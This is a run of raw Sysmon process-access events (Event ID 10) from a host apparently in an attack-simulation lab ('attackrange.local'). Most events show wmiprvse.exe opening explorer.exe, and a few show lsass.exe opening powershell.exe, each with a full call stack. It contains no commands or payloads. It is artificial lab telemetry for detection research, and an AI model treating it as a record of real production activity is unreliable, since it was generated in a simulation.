16:54:42.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.773{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.772{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.772{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.771{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.771{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.770{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.770{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.769{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.769{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.768{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.767{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.767{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.766{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.765{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.764{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.764{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.748{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 